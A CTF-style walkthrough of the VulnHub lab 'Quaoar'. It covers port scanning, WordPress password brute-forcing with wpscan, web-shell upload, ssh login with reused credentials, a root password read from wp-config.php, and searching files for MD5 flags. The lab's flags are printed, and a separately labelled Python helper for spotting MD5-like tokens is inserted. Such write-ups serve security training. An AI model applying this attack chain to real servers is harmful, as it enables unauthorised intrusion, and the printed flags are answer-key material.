VulnHub: New series — hackfest2016 Quaoar


Good day, everyone. It has been a while since I last wrote up a VulnHub lab. In the meantime a small selection of virtual machine images ready for hacking has appeared. In this article we begin with the images prepared for the recently held Hackfest CTF 2016, and look at Quaoar, which you can download here

As the description says, there are 3 flags:
1. Getting shell access;
2. Privilege escalation to root;
3. Post-exploitation.

You can read the more detailed description yourselves, so let's begin.


Flag 1


After booting the VM, it kindly tells us the IP address at which it is reachable:



So we proceed straight to a port scan:

$ sudo nmap -p1-65535 192.168.1.75 -sV

Starting Nmap 7.01 ( nmap.org ) at 2017-04-16 16:26 MSK
Nmap scan report for 192.168.1.75
Host is up (0.00043 s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
110/tcp open pop3?
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3s?
MAC Address: 08:00:27:0A:CA:7B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The description mentions directory brute-forcing. Let's look:

$ sudo dirsearch -u http://192.168.1.75/ -w /opt/dirb/wordlists/big.txt -e php,txt,bak,html -x 403 -r -f



Mostly it found pictures like this one:



In upload there is a site with a hardcoded IP address.

$ ./robotscan.py -u http://192.168.1.75/upload/ -w /opt/dirb/wordlists/big.txt -e php,txt,bak,html -x 403



I'm too lazy to change the IP, so I'll leave it as is, but the wordpress directory holds a full-fledged blog. It is also referenced from robots.txt.

Let's see what wpscan says:

$ sudo ./wpscan.rb --url http://192.168.1.75/wordpress/ --wordlist /usr/share/john/password.lst



wpscan found the correct password, though it did not realize it. We log in to the admin area and upload a simple shell:



First, let's look at the contents of /etc/passwd:



In the home directory of the user wpadmin we find the first flag:




Flag 2


Since the password for the WordPress admin panel was the same as the username, it is worth trying the same approach for ssh:

$ ssh wpadmin@192.168.1.75

Entering the password wpadmin, we successfully land in a shell. A search for SUID/SGID files yielded nothing. Looking through the configs for any passwords at all, we find an interesting one:

wpadmin@Quaoar:~$ cat wp-config.php

define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

It is, of course, meant for connecting to the database, but what if it is also the password of the root account... We check it, and +1 flag in root's home directory:

root@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb


Flag 3


While the first 2 flags were more or less straightforward, the search for the third took far too long. I tried to find another file named flag:

root@Quaoar:~# find / -name flag.txt
/root/flag.txt
/home/wpadmin/flag.txt
root@Quaoar:~# find / -name flag

But nothing. An attempt to search file contents for the word flag was also fruitless:

root@Quaoar:~# grep -r 'flag is' / | less

Ultimately I decided that since the flag is an MD5 hash, it can probably be found with a regular expression. No sooner said than done:

root@Quaoar:~# egrep -r " [a-z0-9]{32,32}" /etc/ 2>/dev/null
...
/etc/cron.d/php5:# Its always a good idea to check for crontab to learn more about the operating system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
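As an added illustration (not part of the original write-up), here is the same idea as a small Python script that walks a directory tree and reports only stand-alone 32-hex tokens, which tightens the egrep pattern above: [a-z0-9]{32,32} also matches non-hex strings and the first 32 characters of a longer hash. The scanned directory is constructed in demo() and only mimics the /etc layout of the VM.

```python
import os
import re
import tempfile
from pathlib import Path

# An MD5 digest is exactly 32 hex characters. The lookarounds require the run
# to stand alone, so a 40-hex SHA-1 is not reported by its first 32 characters.
MD5_RE = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32}(?![0-9a-fA-F])")


def find_md5_like(root, max_size=1_000_000):
    """Walk root and return (path, line_no, token) for every MD5-like token
    in a text file. Unreadable, oversized and binary files are skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = Path(dirpath) / name
            try:
                if path.stat().st_size > max_size:
                    continue
                data = path.read_bytes()
            except OSError:
                continue  # permission denied, file vanished, etc.
            if b"\x00" in data:
                continue  # crude binary check; grep also hides these lines
            text = data.decode("utf-8", errors="replace")
            for line_no, line in enumerate(text.splitlines(), start=1):
                for m in MD5_RE.finditer(line):
                    hits.append((str(path), line_no, m.group(0)))
    return hits


def demo():
    """Scan a constructed directory that mimics the /etc layout on Quaoar."""
    tmp = Path(tempfile.mkdtemp())
    (tmp / "cron.d").mkdir()
    # Constructed cron comment; the hash is the one quoted in the walkthrough.
    (tmp / "cron.d" / "php5").write_text(
        "# check for crontab ... - d46795f84148fd338603d0d6a9dbf8de\n")
    (tmp / "hostname").write_text("Quaoar\n")
    # 32 letters, not hex: the original egrep would report this, MD5_RE does not.
    (tmp / "motd").write_text("token " + "z" * 32 + " here\n")
    # A 40-hex SHA-1 must not be reported by its first 32 characters.
    (tmp / "sha1.txt").write_text("a" * 40 + "\n")
    # Binary file containing the hash: skipped, as grep does by default.
    (tmp / "bin.dat").write_bytes(b"\x00" + b"d46795f84148fd338603d0d6a9dbf8de")
    return find_md5_like(tmp)
```

Calling demo() returns a single hit, the php5 cron comment, while the non-hex token, the SHA-1 and the binary file are correctly ignored.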

Of course, it would have been more logical to look through the cron jobs first, but this alternative works too.

That's about it. All 3 flags found. On to the next level.
Article based on information from habrahabr.ru
